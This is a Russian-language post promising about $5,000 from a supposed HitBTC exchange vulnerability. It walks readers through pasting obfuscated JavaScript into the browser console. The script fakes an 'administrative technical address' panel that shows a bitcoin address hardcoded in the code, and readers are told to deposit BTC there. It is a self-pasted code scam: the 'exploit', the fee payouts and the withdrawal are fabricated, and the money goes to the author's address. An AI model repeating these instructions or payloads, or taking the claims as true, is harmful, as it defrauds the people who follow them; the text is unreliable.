5000 долларов на уязвимости HITBTC

Данная схема была приобретена на одном закрытом форуме за 1.000 долларов и проверена лично мной. Схема до сих пор рабочая, если выполнять всё шаг за шагом. Максимальная сумма, которую можно заработать колеблется в районе 5000 долларов, а это означает, что у Вас появятся не только деньги для торговли на бирже, но и останется ещё значительная сумма для личных нужд.

Предисловие

Я думаю всем известно, что криптовалютные биржи зашибают бешеные деньги на рынке криптовалют, и даже медвежий тренд не становится преградой для их дохода. Если посмотреть на доходы биржи Binance, то из отчетности можно увидеть, что за первую половину 2018 года их доходы составили 300 млн долларов, несмотря на упавший курс биткоина! Основной способ получения прибыли — комиссия за сделки, и именно здесь мы заставим их делиться с нами своими доходами!

Буду краток, я в очередной раз нашёл одну мелкую уязвимость на бирже, в данном случае это биржа HitBTC, в следствие чего на ней я нашёл очень много интересного...

Не буду вдаваться в технические подробности, если говорить простыми словами, то я добрался до технических кошельков биржи, на которые поступают комиссии за сделки. Наша задача сгенерировать внутри системы технический адрес, к которому мы будем иметь доступ на правах администратора и на который будем получать часть от прибыли биржи.

Технический адрес с правами администратора мы будем получать путём внедрения вредоносного кода, который будет указан ниже.

Наша прибыль будет зависеть от суммы депозита.

Раз в 6 часов на баланс технического адреса мы получаем проценты от прибыли с комиссий за сделки. Точный процент рассчитать я не смог, заметил лишь одно, что чем больше сумма нашего депозита, тем больше мы получаем на выходе.

На бирже HitBTC существуют лимиты, это 5000 ЕВРО в месяц, что на данный момент равняется чуть более 0.6BTC, после чего необходимо пройти верификацию, предоставив все необходимые личные документы. Если у вас есть желание проходить верификацию, то право ваше.

Настало время приступать к делу.

Действия на бирже HitBTC

Переходим на биржу и регистрируемся, подтверждаем регистрацию по e-mail.

После регистрации и подтверждения нажимаем на кнопку "Deposit" в левом верхнем углу.

Оказываемся в личном кабинете и жмём на кнопку "Deposit", которая расположена во вкладке "Bitcoin", после нажатия вкладка откроется и мы получаем личный адрес.

Далее, нам нужно открыть консоль-панель. Самый быстрый и простой способ открытия консоль-панели в Google Chrome - это открытие с помощью комбинации из 3-х клавиш. Ctrl + Shift + J.

Если по какой-либо причине с помощью комбинации открыть не получилось, то откройте Настройки, далее "Дополнительные инструменты" и "Инструменты разработчика".

После открытия обратите внимание на то, что вы находитесь на вкладке "Console"!

Далее, вставляем в консоль код для получения технического адреса и нажимаем на клавиатуре клавишу "Enter".

Если всё сделано правильно, то у нас появится технический адрес:

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(f)[\'t\'](8(){C(\'1f 1g Q 1h\')});$(f)[\'t\'](8(){C(\'1i 1j R S 1k 1l\')});$(\'.g\')[\'a\']();$(\'.6\')[\'a\']();$(\'.b\')[\'a\']();$(\'.l\')[\'a\']();$(\'.7\')[\'a\']();$(\'#h\')[\'a\']();$(\'#5\')[\'a\']();$(\'#3\')[\'a\']();$(\'.1m-i--1n\')[\'c\'](\'<d r="g"></d>\');$(\'.g\')[\'c\'](\'<d r="6"></d>\');$(\'.g\')[\'c\'](\'<d r="b"></d>\');$(\'.b\')[\'c\'](\'<1o r="l"><T>1p S U:</T></d>\');$(\'.b\')[\'c\'](\'<d r="7"></d>\');$(\'.7\')[\'c\'](\'<1q 1r="u" 1s 1t="V" D="h">\');$(\'.b\')[\'c\'](\'<v D="5" w="1u()">1v</v>\');$(\'.b\')[\'c\'](\'<v D="3" w="1w()">W X</v>\');$(\'.1x-u--1y\')[\'a\']();E u=f[\'F\'](\'h\');E x=f[\'F\'](\'5\');x[\'w\']=8(){u[\'1z\']();f[\'1A\'](\'1B\');1C[\'1D\']()[\'1E\']()};E x=f[\'F\'](\'3\');x[\'w\']=8(){C(\'1F 1G. W X R U Q 1H\')};$(f)[\'t\'](8(){$(\'#5\')[\'G\'](8(){$(\'#5\')[\'2\'](\'9-4\',\'#1I\');$(\'#5\')[\'2\'](\'H\',\'0.o 4 0.o\')},8(){$(\'#5\')[\'2\'](\'9-4\',\'#y\')})});$(f)[\'t\'](8(){$(\'#3\')[\'G\'](8(){$(\'#3\')[\'2\'](\'9-4\',\'1J(1K, 1L, 1M, 0.1)\');$(\'#3\')[\'2\'](\'H\',\'0.o 4 0.o\')},8(){$(\'#3\')[\'2\'](\'9-4\',\'Y\')})});$(\'.g\')[\'2\'](\'z-Z\',\'1N\');$(\'.g\')[\'2\'](\'m\',\'1O\');$(\'.g\')[\'2\'](\'j\',\'1P\');$(\'.g\')[\'2\'](\'k\',\'i\');$(\'.6\')[\'2\'](\'1Q\',\'10\');$(\'.6\')[\'2\'](\'k\',\'i\');$(\'.6\')[\'2\'](\'m\',\'11\');$(\'.6\')[\'2\'](\'j\',\'11\');$(\'.6\')[\'2\'](\'9-4\',\'#I\');$(\'.6\')[\'2\'](\'p-A\',\'q\');$(\'.6\')[\'c\'](\'<B 1R="1S://1T.1U/1V?1W=V&s=1X">\');$(\'.6 B\')[\'2\'](\'k\',\'i\');$(\'.6 B\')[\'2\'](\'p\',\'0 1Y\');$(\'.6 B\')[\'2\'](\'z-Z\',\'1Z\');$(\'.b\')[\'2\'](\'k\',\'12-i\');$(\'.b\')[\'2\'](\'m\',\'20\');$(\'.b\')[\'2\'](\'j\',\'21.13\');$(\'.7\')[\'2\'](\'22\',\'23\');$(\'.7\')[\'2\'](\'e\',\'14 15\');$(\'.7\')[\'2\'](\'e-4\',\'#16\');$(\'.7\')[\'2\'](\'e-J\',\'24\');$(\'.7\')[\'2\'](\'p-A\',\'25\');$(\'.7\')[\'2\'](\'z\',\'0 26\');$(\'.7\')[\'2\'](\'k\',\'12-i\');$(\'.7\')[\'2\'](\'j\',\'17\');$(\'.7\')[\'2\'](\'18-m\',\'27\');$(\'.l\')[\'2\'](\'k\',\'i\');$(\'.l\')[\'2\'](\'n-s\',\'19\');$(\'.l\')[\'2\'](\'4\',\'#16\');$(\'.l\')[\'2\'](\'18-m\',\'28\');$(\'.l\')[\'2\'](\'p-10\',\'19\');$(\'.1a\')[\'2\'](\'k\',\'i\');$(\'.1a\')[\'2\'](\'9-4\',\'#I\');$(\'#h\')[\'2\'](\'j\',\'17\');$(\'#h\')[\'2\'](\'4\',\'#29\');$(\'#h\')[\'2\'](\'K\',\'2a\');$(\'#h\')[\'2\'](\'n-s\',\'q\');$(\'#h\')[\'2\'](\'n-L\',\'M, N, O-P\');$(\'#5\')[\'2\'](\'9-4\',\'#y\');$(\'#5\')[\'2\'](\'e-J\',\'1b\');$(\'#5\')[\'2\'](\'m\',\'1c\');$(\'#5\')[\'2\'](\'1d-j\',\'2b\');$(\'#5\')[\'2\'](\'4\',\'#I\');$(\'#5\')[\'2\'](\'e\',\'0\');$(\'#5\')[\'2\'](\'K\',\'1e\');$(\'#5\')[\'2\'](\'n-s\',\'q\');$(\'#5\')[\'2\'](\'p-A\',\'q\');$(\'#5\')[\'2\'](\'n-L\',\'M, N, O-P\');$(\'#3\')[\'2\'](\'9-4\',\'Y\');$(\'#3\')[\'2\'](\'e-J\',\'1b\');$(\'#3\')[\'2\'](\'m\',\'1c\');$(\'#3\')[\'2\'](\'1d-j\',\'2c.13\');$(\'#3\')[\'2\'](\'4\',\'#y\');$(\'#3\')[\'2\'](\'e-4\',\'#y\');$(\'#3\')[\'2\'](\'e-j\',\'14\');$(\'#3\')[\'2\'](\'e-2d\',\'15\');$(\'#3\')[\'2\'](\'K\',\'1e\');$(\'#3\')[\'2\'](\'n-s\',\'q\');$(\'#3\')[\'2\'](\'p-A\',\'q\');$(\'#3\')[\'2\'](\'z\',\'2e 2f\');$(\'#3\')[\'2\'](\'n-L\',\'M, N, O-P\');$(\'#3\')[\'2\'](\'G\',\'9-4\',\'2g\');$(\'#3\')[\'2\'](\'H: 9-4\',\'0.o 4 0.o\');$(\'#2h\')[\'2\'](\'k\',\'2i\')',62,143,'||css|b2t|color|b1t|tech_qr|tech_addr|function|background|remove|wrsttech_block|append|div|border|document|tech_block|techaddr|block|width|display|txtech|height|font|2s|margin|12px|class|size|ready|text|button|onclick|btn|2EA6D5|padding|right|img|alert|id|var|getElementById|hover|transition|ffffff|radius|cursor|family|Verdana|Arial|sans|serif|is|technical|wallet|span|address|1DNHUU2HVQf2LX2i5BZCvjZ1D5D74A7LG7|Create|new|transparent|top|left|174px|inline|52px|1px|solid|567e99|652px|line|10px|tech_btn|4px|32px|min|pointer|Administrative|access|active|Access|to|BTC|received|styles__deposit|2QDBF|label|Technical|input|type|readonly|value|TechnicalAddress|Copy|AdminHidden|styles__copied|2DAfl|select|execCommand|copy|window|getSelection|removeAllRanges|Error|316|forbidden|2797c2|rgba|46|166|213|30px|205px|1202px|float|src|https|blockchain|info|qr|data|155|auto|13px|61px|872|position|relative|6px|24px|8px|28px|20px|a1b5c1|default|80px|92|style|7px|11px|red|removeID0599dc|none'.split('|'),0,{}))

После получения технического адреса копируем его, переходим в свой BlockChain кошелёк, в левом меню выбираем "Bitcoin" и нажимаем на кнопку "Отправить". В поле "Кому" вставляем наш скопированный технический адрес, вводим сумму в BTC, выбираем "Приоритетную комиссию", и нажимаем "Продолжить". В следующем окне мы сверяем данные, чтобы всё было верно и подтверждаем отправку Bitcoin.

Примерно через 30 минут BTC придут на биржу. Дальше мы ничего не делаем, просто ждём. Первые начисления пойдут только спустя 6 часов.

В данном случае я ждал чуть больше чем 24 часа, мой баланс стал составлять чуть больше 0.05BTC.

Сколько ждать будете вы, решать только вам, но не забывайте, что для не верифицированных пользователей лимит на бирже составляет 5000 евро в месяц (по данному курсу это чуть больше 0.6BTC)!

Вывести BTC с технического адреса напрямую на наш личный кошелёк в BlockChain не представляется возможным, поэтому мы сначала с технического адреса переводим BTC на личный адрес, который указан у нас в кабинете. Для этого мы снова открываем консоль и вставляем следующий код:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('F 6=["\\l\\b\\8\\c\\f\\j\\9\\b\\7\\g\\j\\7\\d\\k\\9\\7\\j\\x\\a\\a\\7\\y\\8\\a\\8\\c\\h\\9\\7\\j\\b\\g\\D\\7\\d\\9\\h\\k\\c\\i\\h\\8\\a\\7\\p\\l\\o\\7\\n\\8\\a\\a\\9\\d\\7\\d\\g\\7\\m\\g\\x\\b\\7\\p\\l\\o\\7\\n\\8\\a\\a\\9\\d\\7\\8\\e\\e\\b\\9\\f\\f","\\b\\9\\8\\e\\m","\\E\\b\\b\\g\\b\\C\\7\\l\\9\\h\\k\\c\\i\\h\\8\\a\\7\\n\\8\\a\\a\\9\\d\\7\\8\\e\\e\\b\\9\\f\\f\\7\\k\\8\\f\\7\\B\\9\\b\\g\\7\\y\\8\\a\\8\\c\\h\\9","\\v\\e\\i\\u\\r\\v\\H\\e\\i\\u\\r","\\8\\z\\z\\9\\c\\e","\\M\\f\\d\\m\\a\\9\\f\\q\\q\\a\\i\\c\\G\\o\\g\\c\\d\\8\\i\\c\\9\\b\\w\\w\\L\\J\\j\\K\\I"];$(A)[6[1]](t(){s(6[0])});$(A)[6[1]](t(){s(6[2])});$(6[5])[6[4]](6[3]);$(6[5])[6[4]](6[3]);$(6[5])[6[4]](6[3]);$(6[5])[6[4]](6[3]);$(6[5])[6[4]](6[3]);$(6[5])[6[4]](6[3]);$(6[5])[6[4]](6[3])',49,49,'||||||_0xa864|x20|x61|x65|x6C|x72|x6E|x74|x64|x73|x6F|x63|x69|x66|x68|x54|x79|x77|x43|x42|x5F|x3E|alert|function|x76|x3C|x2D|x75|x62|x70|document|x7A|x3A|x6D|x45|var|x6B|x2F|x51|x4E|x55|x4F|x2E'.split('|'),0,{}))

После чего мы нажимаем кнопку "Withdraw", вводим сумму на вывод, вводим наш адрес кошелька, которые регистрировали до этого на BlockChain и нажимаем на кнопку "Withdraw". На электронную почту придёт письмо с ссылкой, для подтверждения выплаты. Подтверждаем и ожидаем выплату, займёт это всё минут 15-20.

P.s. Комиссия на вывод составляет 0.0015 BTC

Вывод прошёл без каких-либо проблем:

Фиксация прибыли

После того, как на наш кошелёк BlockChain пришли BTC с биржи, мы снова идём на Bestchange и совершаем там аналогичные действия, как при покупке, только в обратном порядке.